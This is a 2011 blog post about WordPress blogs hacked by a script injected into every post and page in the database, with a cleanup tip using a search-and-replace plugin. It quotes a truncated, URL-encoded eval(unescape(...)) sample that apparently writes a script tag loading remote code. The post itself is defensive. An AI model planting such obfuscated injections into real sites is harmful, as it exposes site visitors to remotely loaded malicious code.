Mar 17 2011

WordPress database hacked? What to do?

Category: Wordpress Blogs

Answer:

Wordpress hackedTwo of our WordPress blogs were hacked last night. I’m assuming many of you had the same. This hack was a little bit unusual though. After a hack we will typically back up our database and do a clean re-install. Newer WordPress versions allow automatic installs/updates right from the dashboard (very nice). We then checked all of the theme files to verify if any malicious code was injected. Nothing was found. We then noticed something strange, something we had not seen before. The pages and posts were the problem. Every page and post had a script injected. What A**holes!!! It was basically this (See below), with script tags around it:

eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B”.. ….

Here is a quick fix for this problem. A wordpress plugin called search and replace. It is a very easy to use plugin that allows you to search for and replace anything within the tables of your database. We found this to be much easier than accessing the database directly and performing a MySQL update query.

This was just a quick fix. To secure your wordpress blog fully, so this doesn’t happen again, checkout The Official WordPress.org site. There is some excellent information on hardening the security of your WordPress blog. The video below also has some excellent tips.


Tags: , , ,


 

 

Challenge this Answer and/or Discuss